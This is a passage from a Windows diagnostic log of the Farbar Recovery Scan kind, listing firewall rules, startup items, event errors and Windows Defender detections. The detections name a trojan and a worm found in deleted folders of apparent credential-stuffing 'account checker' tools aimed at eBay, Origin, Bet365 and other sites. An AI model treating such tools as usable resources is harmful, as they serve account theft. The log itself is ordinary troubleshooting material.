2019-08-27 17:12 - 2019-08-27 17:12 - 000399872 _____ (TODO: <公司名稱>) [File not signed] C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\Lib\SDKDLL.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Windows\system32\Drivers\fowjmaln.sys:changelist [348]
AlternateDataStreams: C:\Users\ntbea\ntuser.ini:NTV [12836]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [236]
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 00:49 - 2019-03-19 00:49 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\dotnet\
HKCU\Environment\\Path -> C:\Users\ntbea\AppData\Local\Programs\Python\Python36\Scripts\;C:\Users\ntbea\AppData\Local\Programs\Python\Python36\;C:\Users\ntbea\AppData\Local\Programs\Python\Python38-32\Scripts\;C:\Users\ntbea\AppData\Local\Programs\Python\Python38-32\;%USERPROFILE%\AppData\Local\Microsoft\WindowsApps
HKU\S-1-5-21-230749707-3925018352-439227168-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\ntbea\Downloads\Deadpool-Skin-Style.jpg
DNS Servers: 64.233.217.2 - 64.233.217.3
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run32: => "TeamsMachineInstaller"
HKLM\...\StartupApproved\Run32: => "TeamsMachineUninstallerProgramData"
HKLM\...\StartupApproved\Run32: => "TeamsMachineUninstallerLocalAppData"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "LonelyScreen"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [TCP Query User{19209C8C-B371-4813-88D2-A0FE4C318D48}C:\program files (x86)\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{D1BF4802-123B-470B-ADB7-E500EBF82BC9}C:\program files (x86)\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [{AF21CEB9-3B71-426C-9C4C-90C2CE3AB5CA}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{E2EFDD83-E576-4CAF-BF65-7302646D7597}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{BE87D0AC-1D12-449F-87AD-B35E870C4096}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{923828B0-5C2E-4BCC-A46F-6AC5955521F2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{DD4456CA-D852-4C2A-A651-8BF911C2706E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe No File
FirewallRules: [{C7D34A26-89D0-4C95-B4AC-498E762AF7A1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe No File
FirewallRules: [{8F5D90A3-9D98-4478-ADB7-8997FBBCF6FE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\tools\steamvr_environments\game\bin\win64\steamtours.exe No File
FirewallRules: [{27EF0071-87A5-4AB7-8EDB-1DE99F9CA8F9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\tools\steamvr_environments\game\bin\win64\steamtours.exe No File
FirewallRules: [{4CD41F8D-D87C-47EA-B56B-0AAD8045239D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\tools\steamvr_environments\game\bin\win64\steamtourscfg.exe No File
FirewallRules: [{43A84DCF-649C-4C8A-8BC0-E7655B0DFD91}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\tools\steamvr_environments\game\bin\win64\steamtourscfg.exe No File
FirewallRules: [{647EE341-349B-4447-804F-84A54B75B84D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe () [File not signed]
FirewallRules: [{4E3D30F9-DE14-4DF6-AE82-E5EE30DC60D9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe () [File not signed]
FirewallRules: [{A6910F2E-6169-409A-B8E1-698135E7D81E}] => (Allow) C:\ttmnq\plugins\thunder\download\MiniThunderPlatform.exe No File
FirewallRules: [{8FBBA41E-E08D-48C4-AFB0-8564765FD89D}] => (Allow) C:\ttmnq\plugins\thunder\download\MiniThunderPlatform.exe No File
FirewallRules: [{B1770BC7-6099-4DA1-989F-61A6135FFF5D}] => (Allow) C:\ttmnq\vbox\VBoxManage.exe No File
FirewallRules: [{C507B9DE-A3ED-479A-981A-3B0368D9CB50}] => (Allow) C:\ttmnq\vbox\VBoxManage.exe No File
FirewallRules: [{98C4CEDB-8697-4290-B02D-F76D31FC18A5}] => (Allow) C:\ttmnq\vbox\VBoxManage.exe No File
FirewallRules: [{95E80052-BA41-4E82-96BB-E8DF36F40239}] => (Allow) C:\ttmnq\vbox\VBoxManage.exe No File
FirewallRules: [{67FBADD8-6F73-43B8-8DD9-0BC41E3C9E08}] => (Allow) C:\ttmnq\vbox\VBoxHeadless.exe No File
FirewallRules: [{180C9356-8EF7-4657-B554-BD42CCE743E0}] => (Allow) C:\ttmnq\vbox\VBoxHeadless.exe No File
FirewallRules: [{521E0011-6B80-4A20-B73C-EDF6F8524B65}] => (Allow) C:\ttmnq\vbox\VBoxHeadless.exe No File
FirewallRules: [{3162FB61-C940-4B91-A0D4-61C6616D6DF4}] => (Allow) C:\ttmnq\vbox\VBoxHeadless.exe No File
FirewallRules: [TCP Query User{A89DB405-A648-457F-A62B-8DB985D75C62}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{F2785FB6-D23F-4BB6-B96E-1275201CAB5D}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{0C162F9E-9DD9-484B-BCE2-372648BD045F}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{A5E34B5C-6D12-4AAD-A250-D58AB2F25C66}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{0FB6A9AA-3D2E-45CB-B229-1A70B544508E}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe No File
FirewallRules: [UDP Query User{D836EA41-0542-4739-9B8C-38881653F09F}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe No File
FirewallRules: [{E3DD333F-833B-4AB5-B396-FA15074AA202}] => (Allow) D:\New folder\Unity Hub.exe No File
FirewallRules: [TCP Query User{9C5659FB-B34B-49A9-BC88-5587BD2EB5D4}D:\new folder\unity hub.exe] => (Allow) D:\new folder\unity hub.exe No File
FirewallRules: [UDP Query User{46232621-1702-4E3F-B278-D32F6C580A68}D:\new folder\unity hub.exe] => (Allow) D:\new folder\unity hub.exe No File
FirewallRules: [{C769BCF0-E213-44CE-B01A-ABE0FFA412CB}] => (Allow) D:\2018.4.16f1\Editor\Unity.exe No File
FirewallRules: [{47B45B7C-641A-4651-89E2-762954483D42}] => (Block) D:\2018.4.16f1\Editor\Unity.exe No File
FirewallRules: [TCP Query User{59BC6550-0529-44F2-BEE1-D4794CC18908}D:\2018.4.16f1\editor\unity.exe] => (Allow) D:\2018.4.16f1\editor\unity.exe No File
FirewallRules: [UDP Query User{16DE5A9F-8183-483C-873A-8EB8C42050BA}D:\2018.4.16f1\editor\unity.exe] => (Allow) D:\2018.4.16f1\editor\unity.exe No File
FirewallRules: [{53759034-5DF5-4570-AEA5-086D5D430E94}] => (Allow) C:\Program Files\Unity Hub\Unity Hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [TCP Query User{B3F9D0F1-1C1C-4A70-96CD-F9C83FA4BD0A}C:\program files\unity hub\unity hub.exe] => (Allow) C:\program files\unity hub\unity hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [UDP Query User{35AE8335-6EE7-4CCC-A1BD-620C81B8F30C}C:\program files\unity hub\unity hub.exe] => (Allow) C:\program files\unity hub\unity hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [{48989179-3BBD-4A56-BFE7-D5ADDAD510AC}] => (Allow) C:\Program Files\2018.4.17f1\Editor\Unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [{17C34164-8E04-4CCD-865B-C66CCCAADB9E}] => (Block) C:\Program Files\2018.4.17f1\Editor\Unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [TCP Query User{9DA34C77-7552-4552-94D3-2CD208250ED9}C:\program files\2018.4.17f1\editor\unity.exe] => (Allow) C:\program files\2018.4.17f1\editor\unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [UDP Query User{F42CD33B-FC83-46FF-B4D4-14B819D341D2}C:\program files\2018.4.17f1\editor\unity.exe] => (Allow) C:\program files\2018.4.17f1\editor\unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [TCP Query User{71F39B42-6F2A-4730-A2AC-C8BFCB38AC9E}C:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\microsoft\liveshare\agent\vsls-agent.exe] => (Allow) C:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\microsoft\liveshare\agent\vsls-agent.exe () [File not signed]
FirewallRules: [UDP Query User{73EB51A9-8B6A-4C02-93F3-5870E13061AF}C:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\microsoft\liveshare\agent\vsls-agent.exe] => (Allow) C:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\microsoft\liveshare\agent\vsls-agent.exe () [File not signed]
FirewallRules: [TCP Query User{6C8B73EE-5FB3-4023-A3A7-3B34228F2CC9}C:\users\ntbea\appdata\local\programs\python\python38-32\pythonw.exe] => (Allow) C:\users\ntbea\appdata\local\programs\python\python38-32\pythonw.exe No File
FirewallRules: [UDP Query User{701F6A56-371D-40A3-9C31-0EA04E46240C}C:\users\ntbea\appdata\local\programs\python\python38-32\pythonw.exe] => (Allow) C:\users\ntbea\appdata\local\programs\python\python38-32\pythonw.exe No File
FirewallRules: [TCP Query User{47F708AD-4587-4800-92BA-FEEC885EA67A}C:\program files (x86)\lonelyscreen\lonelyscreen.exe] => (Allow) C:\program files (x86)\lonelyscreen\lonelyscreen.exe () [File not signed]
FirewallRules: [UDP Query User{52F3B821-F6E4-49D5-BB0B-7A49E5A74C9A}C:\program files (x86)\lonelyscreen\lonelyscreen.exe] => (Allow) C:\program files (x86)\lonelyscreen\lonelyscreen.exe () [File not signed]
FirewallRules: [{BB9B26BF-6AA7-4254-BD79-57A348FF288B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F314851E-A8AC-4CF7-A7AC-F840D719E2BE}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{28766D74-2FF7-4171-8A65-3C561B77C589}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe No File
FirewallRules: [{35B140C8-5BA6-4BEE-96AB-65E977183DAD}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe No File
FirewallRules: [{67DD5FF7-C1EF-4E0A-980E-A8F2B24A29AE}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerMirror\ApowerMirror.exe No File
FirewallRules: [{38CF1BFC-C163-42C0-BE0C-725E1B514D6B}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerMirror\ApowerMirror.exe No File
FirewallRules: [{CAAC33F5-4135-40D0-A3E2-2FDBC308C897}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe No File
FirewallRules: [{48DE00DA-CCA3-4E15-BCC6-FEFF549C96FF}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe No File
FirewallRules: [{318C28D3-47C2-46FD-9749-CD1F0CA87F2B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe No File
FirewallRules: [{5DDC3117-4084-4E71-8C3E-53886AD25A07}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe No File
FirewallRules: [{AE0DD4CC-6689-4FB5-8D32-E4C29B160412}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe No File
FirewallRules: [{F62BE1F2-2DBC-4173-880F-6E9F716C85F1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{D0628BA5-C50C-413F-88B5-62895A14F3BB}] => (Allow) LPort=26820
FirewallRules: [{C0E91A00-3AD1-4F5E-ADE7-9921EE959022}] => (Allow) LPort=26822
==================== Restore Points =========================
20-04-2020 11:21:58 Removed Python Launcher
22-04-2020 14:47:14 Removed Teams Machine-Wide Installer
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (04/23/2020 08:45:22 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.18362.1, time stamp: 0x533f8404
Faulting module name: twinapi.appcore.dll, version: 10.0.18362.693, time stamp: 0xd9f9dc8c
Exception code: 0xc000027b
Fault offset: 0x00000000000d63e8
Faulting process id: 0x3978
Faulting application start time: 0x01d6196d0c434fe7
Faulting application path: C:\Windows\system32\backgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: 804863f9-48f5-4e92-999b-d27bc6dec6f6
Faulting package full name: Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: Microsoft.MicrosoftOfficeHub
Error: (04/22/2020 10:42:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.18362.1, time stamp: 0x533f8404
Faulting module name: twinapi.appcore.dll, version: 10.0.18362.693, time stamp: 0xd9f9dc8c
Exception code: 0xc000027b
Fault offset: 0x00000000000d63e8
Faulting process id: 0x3a0c
Faulting application start time: 0x01d61918d750aa7c
Faulting application path: C:\Windows\system32\backgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: 7becd387-934e-4d62-9b4a-ef443c4ca7a8
Faulting package full name: Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: Microsoft.MicrosoftOfficeHub
Error: (04/22/2020 10:38:45 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Minecraft.Windows.exe version 1.15.0.8 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 422c
Start Time: 01d619182ab17b11
Termination Time: 4294967295
Application Path: C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.15.8.0_x64__8wekyb3d8bbwe\Minecraft.Windows.exe
Report Id: ea97c59c-154e-4ee0-bed9-7a805029d600
Faulting package full name: Microsoft.MinecraftUWP_1.15.8.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: App
Hang type: Cross-thread
Error: (04/22/2020 10:34:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DISCOR~1.EXE, version: 0.0.0.0, time stamp: 0x5e75165e
Faulting module name: DISCOR~1.EXE, version: 0.0.0.0, time stamp: 0x5e75165e
Exception code: 0xc0000005
Fault offset: 0x000000000001bb1b
Faulting process id: 0x4f20
Faulting application start time: 0x01d61917bbdc1f52
Faulting application path: C:\Users\ntbea\AppData\Local\Temp\3582-490\DISCOR~1.EXE
Faulting module path: C:\Users\ntbea\AppData\Local\Temp\3582-490\DISCOR~1.EXE
Report Id: 3c4a42be-bb6f-4d2e-bc2a-27b0b45ded92
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/22/2020 10:33:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.18362.1, time stamp: 0x533f8404
Faulting module name: twinapi.appcore.dll, version: 10.0.18362.693, time stamp: 0xd9f9dc8c
Exception code: 0xc000027b
Fault offset: 0x00000000000d63e8
Faulting process id: 0x4964
Faulting application start time: 0x01d61917825c67c7
Faulting application path: C:\Windows\system32\backgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: 82569494-c82d-40c6-a09c-c6f95f3d19cc
Faulting package full name: Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: Microsoft.MicrosoftOfficeHub
Error: (04/22/2020 10:23:04 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program devenv.exe version 16.5.30011.22 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 40dc
Start Time: 01d61916092599d6
Termination Time: 7
Application Path: C:\PROGRA~2\MICROS~1\2019\COMMUN~1\Common7\IDE\devenv.exe
Report Id: ccea204b-3367-4278-ab65-d924211d335c
Faulting package full name: 
Faulting package-relative application ID: 
Hang type: Unknown
Error: (04/22/2020 10:22:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MICROS~1.EXE, version: 2.3.88.5166, time stamp: 0xf39682d8
Faulting module name: KERNELBASE.dll, version: 10.0.18362.778, time stamp: 0xafa78a6a
Exception code: 0xe0434352
Fault offset: 0x000000000003a799
Faulting process id: 0x46dc
Faulting application start time: 0x01d6191614df59ca
Faulting application path: C:\Users\ntbea\AppData\Local\Temp\3582-490\MICROS~1.EXE
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: 462f59d6-b43b-40fc-94fd-cef591adc4fe
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/22/2020 10:22:49 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: MICROS~1.EXE
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.IO.FileNotFoundException
   at Microsoft.ServiceHub.Controller.Program.Main(System.String[])
System errors:
=============
Error: (04/23/2020 09:24:36 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 10:38:30 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073d02: 9NBLGGH2JHXJ-MICROSOFT.MINECRAFTUWP.
Error: (04/22/2020 03:57:43 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 03:54:15 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 02:43:09 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-O22KKMM)
Description: The server {71DCE5D6-4B57-496B-AC21-CD5B54EB93FD} did not register with DCOM within the required timeout.
Error: (04/22/2020 11:02:09 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 10:45:03 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 10:35:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Windows Defender:
===================================
Date: 2020-04-22 09:58:38.961
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Trojan:Win32/Tiggre!rfn
ID: 2147723625
Severity: Severe
Category: Trojan
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\ebay Checker Account  By X-KILLER\Ebay reg Checker Account  By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\freebitco.in Checker Account  By X-KILLER\freebitco.in Checker Account  By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\heroku Checker By X-KILLER\heroku Checker By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\HideMyAss! checker BY X-KILLER\HideMyAss! checker BY X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\minecraftservers Checker By X-KILLER\minecraftservers Checker By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Origin Checker Account  By X-KILLER\Origin Checker Account  By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-100
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-22 09:58:37.952
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Worm:Win32/Mofksys.B
ID: 2147681840
Severity: Severe
Category: Worm
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\000webhost.com Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Adfoc.us Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Alexa Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Amazon Valid Email Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bet365 Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Betfair Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bohoo Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bonusbitcoin Accounts Checker By X-SLAYER.exe; file:_
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-22 09:58:37.928
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Worm:Win32/Mofksys.B
ID: 2147681840
Severity: Severe
Category: Worm
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\000webhost.com Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Adfoc.us Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Alexa Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Amazon Valid Email Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bet365 Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Betfair Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bohoo Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bonusbitcoin Accounts Checker By X-SLAYER.exe; file:_
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-22 09:58:37.782
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Worm:Win32/Mofksys.B
ID: 2147681840
Severity: Severe
Category: Worm
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\000webhost.com Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Adfoc.us Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Alexa Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Amazon Valid Email Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bet365 Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Betfair Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bohoo Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bonusbitcoin Accounts Checker By X-SLAYER.exe; file:_
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-22 09:58:37.754
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Worm:Win32/Mofksys.B
ID: 2147681840
Severity: Severe
Category: Worm
